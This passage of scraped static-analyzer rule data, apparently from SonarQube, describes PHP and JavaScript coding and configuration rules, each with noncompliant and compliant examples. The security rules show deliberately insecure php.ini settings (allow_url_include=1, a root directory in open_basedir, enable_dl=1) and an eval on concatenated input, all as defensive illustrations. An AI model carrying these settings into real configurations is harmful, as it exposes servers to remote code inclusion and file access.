href=\"https:\/\/www.owasp.org\/index.php\/Session_Management_Cheat_Sheet#Expire_and_Max-Age_Attributes\">OWASP, Session Management Cheat\n Sheet<\/a> - Expire and Max-Age Attributes <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"VULNERABILITY"},{"key":"php:S3333","repo":"php","name":"\"open_basedir\" should limit file access","htmlDesc":"<p>The <code>open_basedir<\/code> configuration in <em>php.ini<\/em> limits the files the script can access using, for example, <code>include<\/code> and\n<code>fopen()<\/code>. Leave it out, and there is no default limit, meaning that any file can be accessed. Include it, and PHP will refuse to access\nfiles outside the allowed path.<\/p>\n<p><code>open_basedir<\/code> should be configured with a directory, which will then be accessible recursively. However, the use of <code>.<\/code>\n(current directory) as an <code>open_basedir<\/code> value should be avoided since it's resolved dynamically during script execution, so a\n<code>chdir('\/')<\/code> command could lay the whole server open to the script.<\/p>\n<p>This is not a fool-proof configuration; it can be reset or overridden at the script level. But its use should be seen as a minimum due diligence\nstep. This rule raises an issue when <code>open_basedir<\/code> is not present in <em>php.ini<\/em>, and when <code>open_basedir<\/code> contains root,\nor the current directory (<code>.<\/code>) symbol.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n; php.ini try 1\n; open_basedir=\"${USER}\/scripts\/data\" Noncompliant; commented out\n\n; php.ini try 2\nopen_basedir=\"\/:${USER}\/scripts\/data\" ; Noncompliant; root directory in the list\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n; php.ini try 1\nopen_basedir=\"${USER}\/scripts\/data\"\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/cwe.mitre.org\/data\/definitions\/23.html\">MITRE, CWE-23<\/a> - Relative Path Traversal <\/li>\n <li> <a href=\"https:\/\/cwe.mitre.org\/data\/definitions\/36.html\">MITRE, CWE-36<\/a> - Absolute Path Traversal <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"VULNERABILITY"},{"key":"php:S3334","repo":"php","name":"\"allow_url_fopen\" and \"allow_url_include\" should be disabled","htmlDesc":"<p><code>allow_url_fopen<\/code> and <code>allow_url_include<\/code> allow code to be read into a script from URL's. The ability to suck in executable\ncode from outside your site, coupled with imperfect input cleansing could lay your site bare to attackers. Even if your input filtering is perfect\ntoday, are you prepared to bet your site that it will always be perfect in the future?<\/p>\n<p>This rule raises an issue when either property is explicitly enabled in <em>php.ini<\/em> and when <code>allow_url_fopen<\/code>, which defaults to\nenabled, is not explicitly disabled.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n; php.ini Noncompliant; allow_url_fopen not explicitly disabled\nallow_url_include=1 ; Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n; php.ini\nallow_url_fopen=0\nallow_url_include=0\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/cwe.mitre.org\/data\/definitions\/829.html\">MITRE, CWE-829<\/a> - Inclusion of Functionality from Untrusted Control Sphere <\/li>\n <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A1-Injection\">OWASP Top Ten 2013 Category A1<\/a> - Injection <\/li>\n <li> <a href=\"http:\/\/www.sans.org\/top25-software-errors\/\">SANS Top 25<\/a> - Risky Resource Management <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"VULNERABILITY"},{"key":"php:S3335","repo":"php","name":"\"cgi.force_redirect\" should be enabled","htmlDesc":"<p>The <code>cgi.force_redirect<\/code> <em>php.ini<\/em> configuration is on by default, and it prevents unauthenticated access to scripts when PHP is\nrunning as a CGI. Unfortunately, it must be disabled on IIS, OmniHTTPD and Xitami, but in all other cases it should be on.<\/p>\n<p>This rule raises an issue when when <code>cgi.force_redirect<\/code> is explicitly disabled.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n; php.ini\ncgi.force_redirect=0 ; Noncompliant\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/305\">MITRE, CWE-305<\/a> - Authentication Bypass by Primary Weakness <\/li>\n <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A5-Security_Misconfiguration\">OWASP Top Ten 2013 Category A5<\/a> - Security\n Misconfiguration <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"VULNERABILITY"},{"key":"php:S3336","repo":"php","name":"\"session.use_trans_sid\" should not be enabled","htmlDesc":"<p>PHP's <code>session.use_trans_sid<\/code> automatically appends the user's session id to urls when cookies are disabled. On the face of it, this\nseems like a nice way to let uncookie-able users use your site anyway. In reality, it makes those users vulnerable to having their sessions hijacked\nby anyone who might:<\/p>\n<ul>\n <li> see the URL over the user's shoulder <\/li>\n <li> be sent the URL by the user <\/li>\n <li> retrieve the URL from browser history <\/li>\n <li> ... <\/li>\n<\/ul>\n<p>For that reason, it's better to practice a little \"tough love\" with your users and force them to turn on cookies.<\/p>\n<p>Since <code>session.use_trans_sid<\/code> is off by default, this rule raises an issue when it is explicitly enabled.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n; php.ini\nsession.use_trans_sid=1 ; Noncompliant\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A5-Security_Misconfiguration\">OWASP Top Ten 2013 Category A5<\/a> - Security\n Misconfiguration <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"VULNERABILITY"},{"key":"php:S3337","repo":"php","name":"\"enable_dl\" should be disabled","htmlDesc":"<p><code>enable_dl<\/code> is on by default and allows <code>open_basedir<\/code> restrictions, which limit the files a script can access, to be\nignored. For that reason, it's a dangerous option and should be explicitly turned off.<\/p>\n<p>This rule raises an issue when <code>enable_dl<\/code> is not explicitly set to 0 in <em>php.ini<\/em>.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n; php.ini\nenable_dl=1 ; Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n; php.ini\nenable_dl=0\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/cwe.mitre.org\/data\/definitions\/23.html\">MITRE, CWE-23<\/a> - Relative Path Traversal <\/li>\n <li> <a href=\"https:\/\/cwe.mitre.org\/data\/definitions\/36.html\">MITRE, CWE-36<\/a> - Absolute Path Traversal <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"VULNERABILITY"},{"key":"php:S3338","repo":"php","name":"\"file_uploads\" should be disabled","htmlDesc":"<p><code>file_uploads<\/code> is an on-by-default PHP configuration that allows files to be uploaded to your site. Since accepting <del>candy<\/del>\nfiles from strangers is inherently dangerous, this feature should be disabled unless it is absolutely necessary for your site.<\/p>\n<p>This rule raises an issue when <code>file_uploads<\/code> is not explicitly disabled.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n; php.ini\nfile_uploads=1 ; Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n; php.ini\nfile_uploads=0\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/cwe.mitre.org\/data\/definitions\/434.html\">MITRE, CWE-434<\/a> - Unrestricted Upload of File with Dangerous Type <\/li>\n <li> <a href=\"http:\/\/www.sans.org\/top25-software-errors\/\">SANS Top 25<\/a> - Insecure Interaction Between Components <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"VULNERABILITY"},{"key":"php:S881","repo":"php","name":"Increment (++) and decrement (--) operators should not be used in a method call or mixed with other operators in an expression","htmlDesc":"<p>The use of increment and decrement operators in method calls or in combination with other arithmetic operators is not recommended, because:<\/p>\n<ul>\n <li> It can significantly impair the readability of the code. <\/li>\n <li> It introduces additional side effects into a statement, with the potential for undefined behavior. <\/li>\n <li> It is safer to use these operators in isolation from any other arithmetic operators. <\/li>\n<\/ul>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$u8a = ++$u8b + $u8c--;\n$foo = $bar++ \/ 4;\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<p>The following sequence is clearer and therefore safer:<\/p>\n<pre>\n++$u8b;\n$u8a = $u8b + $u8c;\n$u8c--;\n$foo = $bar \/ 4;\n$bar++;\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 12.1 - Limited dependence should be placed on the C operator precedence rules in expressions. <\/li>\n <li> MISRA C:2004, 12.13 - The increment (++) and decrement (--) operators should not be mixed with other operators in an expression. <\/li>\n <li> MISRA C++:2008, 5-2-10 - The increment (++) and decrement (--) operator should not be mixed with other operators in an expression. <\/li>\n <li> MISRA C:2012, 12.1 - The precedence of operators within expressions should be made explicit <\/li>\n <li> MISRA C:2012, 13.3 - A full expression containing an increment (++) or decrement (--) operator should have no other potential side effects\n other than that cause by the increment or decrement operator <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/ZwE\">CERT, EXP30-C.<\/a> - Do not depend on the order of evaluation for side effects\n <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/fYAyAQ\">CERT, EXP50-CPP.<\/a> - Do not depend on the order of evaluation for side\n effects <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/yQC7AQ\">CERT, EXP05-J.<\/a> - Do not follow a write by a subsequent write or read of the\n same object within an expression <\/li>\n<\/ul>","status":"READY","tags":["rank4"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S905","repo":"php","name":"Non-empty statements should change control flow or have at least one side-effect","htmlDesc":"<p>Any statement (other than a null statement, which means a statement containing only a semicolon <code>;<\/code>) which has no side effect and does\nnot result in a change of control flow will normally indicate a programming error, and therefore should be refactored.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$a == 1; \/\/ Noncompliant; was assignment intended?\n$a < $b; \/\/ Noncompliant; have we forgotten to assign the result to a variable?\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/482\">MITRE, CWE-482<\/a> - Comparing instead of Assigning <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n <li> MISRA C:2004, 14.2 - All non-null statements shall either have at least one side-effect however executed, or cause control flow to change.\n <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S907","repo":"php","name":"\"goto\" statement should not be used","htmlDesc":"<p><code>goto<\/code> is an unstructured control flow statement. It makes code less readable and maintainable. Structured control flow statements such\nas <code>if<\/code>, <code>for<\/code>, <code>while<\/code>, <code>continue<\/code> or <code>break<\/code> should be used instead.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$i = 0;\nloop:\n echo(\"i = $i\");\n $i++;\n if ($i < 10){\n goto loop;\n }\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfor ($i = 0; $i < 10; $i++){\n echo(\"i = $i\");\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 14.4 - The goto statement shall not be used. <\/li>\n <li> MISRA C:2012, 15.1 - The goto statement should not be used <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"}],"language":"php","languages":{"cs":"C#","java":"Java","js":"JavaScript","objc":"Objective C","php":"PHP","swift":"Swift","vbnet":"VB.NET","android":"Android","py":"Python"},"ranktag":"^rank\\d$"};- Exclude checks
BUG found Open
Open
window.data = {"total":92,"p":1,"ps":500,"rules":[{"key":"common-js:InsufficientBranchCoverage","repo":"common-js","name":"Branches should have sufficient coverage by tests","htmlDesc":"An issue is created on a file as soon as the branch coverage on this file is less than the required threshold.It gives the number of branches to be covered in order to reach the required threshold.","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[{"key":"minimumBranchCoverageRatio","defaultValue":"65","type":"FLOAT"}],"type":"CODE_SMELL"},{"key":"javascript:ArrayAndObjectConstructors","repo":"javascript","name":"Array constructors should not be used","htmlDesc":"<p>Array literals should always be preferred to Array constructors.<\/p>\n<p>Array constructors are error-prone due to the way their arguments are interpreted. If more than one argument is used, the array length will be\nequal to the number of arguments. However, using a single argument will have one of three consequences:<\/p>\n<ul>\n <li> If the argument is a number and it is a natural number the length will be equal to the value of the argument. <\/li>\n <li> If the argument is a number, but not a natural number an exception will be thrown. <\/li>\n <li> Otherwise the array will have one element with the argument as its value. <\/li>\n<\/ul>\n<p>For these reasons, if someone changes the code to pass 1 argument instead of 2 arguments, the array might not have the expected length. To avoid\nthese kinds of weird cases, always use the more readable array.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar a1 = new Array(x1, x2, x3); \/\/ Noncompliant. Results in 3-element array.\nvar a2 = new Array(x1); \/\/ Noncompliant and variable in results\nvar a3 = new Array(); \/\/ Noncompliant. Results in 0-element array.\n\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar a1 = [x1, x2, x3];\nvar a2 = [x1];\nvar a3 = [];\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:AssignmentWithinCondition","repo":"javascript","name":"Assignments should not be made from within sub-expressions","htmlDesc":"<p>Assignments within sub-expressions are hard to spot and therefore make the code less readable. Ideally, sub-expressions should not have\nside-effects.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif ((str = cont.substring(pos1, pos2)) != '') { \/\/ Noncompliant\n \/\/...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nstr = cont.substring(pos1, pos2);\nif (str != '') {\n \/\/...\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Assignments in <code>while<\/code> statement conditions, and assignments enclosed in relational expressions are allowed.<\/p>\n<pre>\nwhile ((line = nextLine()) != null) {...} \/\/ Compliant\n\nwhile (line = nextLine()) {...} \/\/ Compliant\n\nif (line = nextLine()) {...} \/\/ Noncompliant\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 13.1 - Assignment operators shall not be used in expressions that yield a Boolean value <\/li>\n <li> MISRA C++:2008, 6-2-1 - Assignment operators shall not be used in sub-expressions <\/li>\n <li> MISRA C:2012, 13.4 - The result of an assignment operator should not be used <\/li>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/481.html\">MITRE, CWE-481<\/a> - Assigning instead of Comparing <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/nYFtAg\">CERT, EXP45-C.<\/a> - Do not perform assignments in selection statements <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/1gCTAw\">CERT, EXP51-J.<\/a> - Do not perform assignments in conditional expressions\n <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/KQvhAg\">CERT, EXP19-CPP.<\/a> - Do not perform assignments in conditional expressions\n <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/KYIyAQ\">CERT, MSC02-CPP.<\/a> - Avoid errors of omission <\/li>\n<\/ul>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:BitwiseOperators","repo":"javascript","name":"Bitwise operators should not be used in boolean contexts","htmlDesc":"<p>The bitwise operators <code>&<\/code>, <code>|<\/code> can be mistaken for the boolean operators <code>&&<\/code> and <code>||<\/code>.\n<\/p>\n<p>This rule raises an issue when <code>&<\/code> or <code>|<\/code> is used in a boolean context.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (a & b) { ... } \/\/ Noncompliant; & used in error\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (a && b) { ... }\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>When a file contains other bitwise operations, (<code>^<\/code>, <code><<<\/code>, <code>>>><\/code>, <code>>><\/code>,\n<code>~<\/code>, <code>&=<\/code>, <code>^=<\/code>, <code>|=<\/code>, <code><<=<\/code>, <code>>>=<\/code>, <code>>>>=<\/code> and\n<code>&<\/code> or <code>|<\/code> used with a numeric literal as the right operand) all issues in the file are ignored, because it is evidence that\nbitwise operations are truly intended in the file.<\/p>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:BoundOrAssignedEvalOrArguments","repo":"javascript","name":"\"eval\" and \"arguments\" should not be bound or assigned","htmlDesc":"<p><code>eval<\/code> is used to evaluate a string as JavaScript code, and <code>arguments<\/code> is used to access function arguments through indexed\nproperties. As a consequence, <code>eval<\/code> and <code>arguments<\/code> should not be bound or assigned, because doing so would overwrite the\noriginal definitions of those two reserved words. <\/p>\n<p>What's more, using either of those two names to assign or bind will generate an error in JavaScript strict mode code.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\neval = 17; \/\/ Noncompliant\narguments++; \/\/ Noncompliant\n++eval; \/\/ Noncompliant\nvar obj = { set p(arguments) { } }; \/\/ Noncompliant\nvar eval; \/\/ Noncompliant\ntry { } catch (arguments) { } \/\/ Noncompliant\nfunction x(eval) { } \/\/ Noncompliant\nfunction arguments() { } \/\/ Noncompliant\nvar y = function eval() { }; \/\/ Noncompliant\nvar f = new Function(\"arguments\", \"return 17;\"); \/\/ Noncompliant\n\nfunction fun() {\n if (arguments.length == 0) { \/\/ Compliant\n \/\/ do something\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nresult = 17;\nargs++;\n++result;\nvar obj = { set p(arg) { } };\nvar result;\ntry { } catch (args) { }\nfunction x(arg) { }\nfunction args() { }\nvar y = function fun() { };\nvar f = new Function(\"args\", \"return 17;\");\n\nfunction fun() {\n if (arguments.length == 0) {\n \/\/ do something\n }\n}\n<\/pre>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:CollapsibleIfStatements","repo":"javascript","name":"Collapsible \"if\" statements should be merged","htmlDesc":"<p>Merging collapsible <code>if<\/code> statements increases the code's readability.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (x != undefined) {\n if (x === 2) {\n \/\/ ...\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (x != undefined && x === 2) {\n \/\/ ...\n}\n<\/pre>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:ContinueStatement","repo":"javascript","name":"\"continue\" should not be used","htmlDesc":"<p><code>continue<\/code> is an unstructured control flow statement. It makes code less testable, less readable and less maintainable. Structured\ncontrol flow statements such as <code>if<\/code> should be used instead.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n for (i = 0; i < 10; i++) {\n if (i == 5) {\n continue; \/* Noncompliant *\/\n }\n alert(\"i = \" + i);\n }\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n for (i = 0; i < 10; i++) {\n if (i != 5) { \/* Compliant *\/\n alert(\"i = \" + i);\n }\n }\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 14.5 - The continue statement shall not be used. <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:ElseIfWithoutElse","repo":"javascript","name":"\"if ... else if\" constructs should end with \"else\" clauses","htmlDesc":"<p>This rule applies whenever an <code>if<\/code> statement is followed by one or more <code>else if<\/code> statements; the final <code>else if<\/code>\nshould be followed by an <code>else<\/code> statement.<\/p>\n<p>The requirement for a final <code>else<\/code> statement is defensive programming.<\/p>\n<p>The <code>else<\/code> statement should either take appropriate action or contain a suitable comment as to why no action is taken. This is\nconsistent with the requirement to have a final <code>default<\/code> clause in a <code>switch<\/code> statement.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (x == 0) {\n doSomething();\n} else if (x == 1) {\n doSomethingElse();\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (x == 0) {\n doSomething();\n} else if (x == 1) {\n doSomethingElse();\n} else {\n throw \"Unexpected value for x\";\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 14.10 - All if...else if constructs shall be terminated with an else clause. <\/li>\n <li> MISRA C++:2008, 6-4-2 - All if...else if constructs shall be terminated with an else clause. <\/li>\n <li> MISRA C:2012, 15.7 - All if...else if constructs shall be terminated with an else statement <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/YgE\">CERT, MSC01-C.<\/a> - Strive for logical completeness <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/JoIyAQ\">CERT, MSC01-CPP.<\/a> - Strive for logical completeness <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/PQHRAw\">CERT, MSC57-J.<\/a> - Strive for logical completeness <\/li>\n<\/ul>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:EqEqEq","repo":"javascript","name":"\"===\" and \"!==\" should be used instead of \"==\" and \"!=\"","htmlDesc":"<p>The <code>==<\/code> and <code>!=<\/code> operators do type coercion before comparing values. This is bad because it can mask type errors. For\nexample, it evaluates <code>' \\t\\r\\n' == 0<\/code> as <code>true<\/code>.<\/p>\n<p>It is best to always use the side-effect-less <code>===<\/code> and <code>!==<\/code> operators instead.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (var == 'howdy') {...} \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (var === 'howdy') {...}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Even if testing the equality of a variable against null doesn't do exactly what most JavaScript developers believe, usage of <code>==<\/code> or\n<code>!=<\/code> is tolerated in such context. In the following case, if <code>foo<\/code> hasn't been initialized, its default value is not\n<code>null<\/code> but <code>undefined<\/code>. Nevertheless <code>undefined == null<\/code>, so JavaScript developers get the expected behavior.<\/p>\n<pre>\nif(foo == null) {...}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:Eval","repo":"javascript","name":"Code should not be dynamically injected and executed","htmlDesc":"<p>The <code>eval<\/code> function is a way to run arbitrary code at run-time. Dynamically evaluating code is slow and a potential security issue when\nthe arguments haven't been properly validated.<\/p>\n<p>In general it is better to avoid it altogether, particularly when there are safer alternatives.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar value = eval('obj.' + propName); \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar value = obj[propName];\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>This rule will not raise an issue when the argument of the <code>eval<\/code> call is a literal string as it is reasonably safe.<\/p>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/95.html\">MITRE CWE-95<\/a> - CWE-95: Improper Neutralization of Directives in Dynamically\n Evaluated Code ('Eval Injection') <\/li>\n <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A3-Cross-Site_Scripting_(XSS)\">OWASP Top Ten 2013 Category A3<\/a> - Cross-Site Scripting\n (XSS) <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"VULNERABILITY"},{"key":"javascript:ExcessiveParameterList","repo":"javascript","name":"Functions should not have too many parameters","htmlDesc":"<p>A long parameter list can indicate that a new structure should be created to wrap the numerous parameters or that the function is doing too many\nthings.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With a maximum number of 4 parameters:<\/p>\n<pre>\nfunction doSomething(param1, param2, param3, param4, param5) {\n...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction doSomething(param1, param2, param3, param4) {\n...\n}\n<\/pre>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[{"key":"maximumFunctionParameters","htmlDesc":"The maximum authorized number of parameters","defaultValue":"7","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"javascript:ForIn","repo":"javascript","name":"\"for...in\" loops should filter properties before acting on them","htmlDesc":"<p>The <code>for...in<\/code> statement allows you to loop through the names of all of the properties of an object. The list of properties includes all\nthose properties that were inherited through the prototype chain. This has the side effect of serving up functions when the interest is in data\nproperties. Programs that don't take this into account can fail.<\/p>\n<p>Therefore, the body of every <code>for...in<\/code> statement should be wrapped in an <code>if<\/code> statement that filters which properties are\nacted upon. It can select for a particular type or range of values, or it can exclude functions, or it can exclude properties from the prototype. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfor (name in object) {\n doSomething(name); \/\/ Noncompliant\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfor (name in object) {\n if (object.hasOwnProperty(name)) {\n doSomething(name);\n }\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Loops used to clone objects are ignored.<\/p>\n<pre>\nfor (prop in obj) {\n a[prop] = obj[prop]; \/\/ Compliant by exception\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:FunctionComplexity","repo":"javascript","name":"Functions should not be too complex","htmlDesc":"<p>The Cyclomatic Complexity of functions should not exceed a defined threshold. Complex code may perform poorly and can be difficult to test\nthoroughly.<\/p>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[{"key":"maximumFunctionComplexityThreshold","htmlDesc":"The maximum authorized complexity in function","defaultValue":"10","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"javascript:FunctionDeclarationsWithinBlocks","repo":"javascript","name":"Function declarations should not be made within blocks","htmlDesc":"<p>While most script engines support function declarations within blocks, it is not part of ECMAScript 5 and below, and from browser to browser the\nimplementations are inconsistent with each other. ECMAScript 5 and below only allow function declarations in the root statement list of a script or\nfunction. If you are targeting browsers that don't support ECMAScript 6, use a variable initialized with a function expression to define a function\nwithin a block :<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (x) {\n function foo() {}\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (x) {\n var foo = function() {}\n}\n<\/pre>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:FutureReservedWords","repo":"javascript","name":"\"future reserved words\" should not be used as identifiers","htmlDesc":"<p>The following words may be used as keywords in future evolutions of the language, so using them as identifiers should be avoided to allow an easier\nadoption of those potential future versions:<\/p>\n<ul>\n <li> <code>await<\/code> <\/li>\n <li> <code>class<\/code> <\/li>\n <li> <code>const<\/code> <\/li>\n <li> <code>enum<\/code> <\/li>\n <li> <code>export<\/code> <\/li>\n <li> <code>extends<\/code> <\/li>\n <li> <code>implements<\/code> <\/li>\n <li> <code>import<\/code> <\/li>\n <li> <code>interface<\/code> <\/li>\n <li> <code>let<\/code> <\/li>\n <li> <code>package<\/code> <\/li>\n <li> <code>private<\/code> <\/li>\n <li> <code>protected<\/code> <\/li>\n <li> <code>public<\/code> <\/li>\n <li> <code>static<\/code> <\/li>\n <li> <code>super<\/code> <\/li>\n <li> <code>yield<\/code> <\/li>\n<\/ul>\n<p>Use of these words as identifiers would produce an error in JavaScript <code>strict<\/code> mode code.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar package = document.getElementsByName(\"foo\"); \/\/ Noncompliant\nvar someData = { package: true }; \/\/ Compliant, as it is not used as an identifier here\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar elements = document.getElementsByName(\"foo\"); \/\/ Compliant\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:LabelPlacement","repo":"javascript","name":"Only \"while\", \"do\" and \"for\" statements should be labelled","htmlDesc":"<p>Any statement or block of statements can be identified by a label, but those labels should be used only on <code>while<\/code>,\n<code>do-while<\/code> and <code>for<\/code> statements. Using labels in any other context leads to unstructured, confusing code. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nmyLabel:if (i % 2 == 0) { \/\/ Noncompliant\n if (i == 12) {\n print(\"12\");\n break myLabel;\n }\n print(\"Odd number, but not 12\");\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nmyLabel:for (i = 0; i < 10; i++) { \/\/ Compliant\n print(\"Loop\");\n break myLabel;\n}\n<\/pre>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:NestedIfDepth","repo":"javascript","name":"Control flow statements \"if\", \"for\", \"while\", \"switch\" and \"try\" should not be nested too deeply","htmlDesc":"<p>Nested <code>if<\/code>, <code>for<\/code>, <code>while<\/code>, <code>switch<\/code>, and <code>try<\/code> statements is a key ingredient for making\nwhat's known as \"Spaghetti code\".<\/p>\n<p>Such code is hard to read, refactor and therefore maintain.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default threshold of 3:<\/p>\n<pre>\n if (condition1) { \/\/ Compliant - depth = 1\n \/* ... *\/\n if (condition2) { \/\/ Compliant - depth = 2\n \/* ... *\/\n for(int i = 0; i < 10; i++) { \/\/ Compliant - depth = 3, not exceeding the limit\n \/* ... *\/\n if (condition4) { \/\/ Non-Compliant - depth = 4\n if (condition5) { \/\/ Depth = 5, exceeding the limit, but issues are only reported on depth = 4\n \/* ... *\/\n }\n return;\n }\n }\n }\n 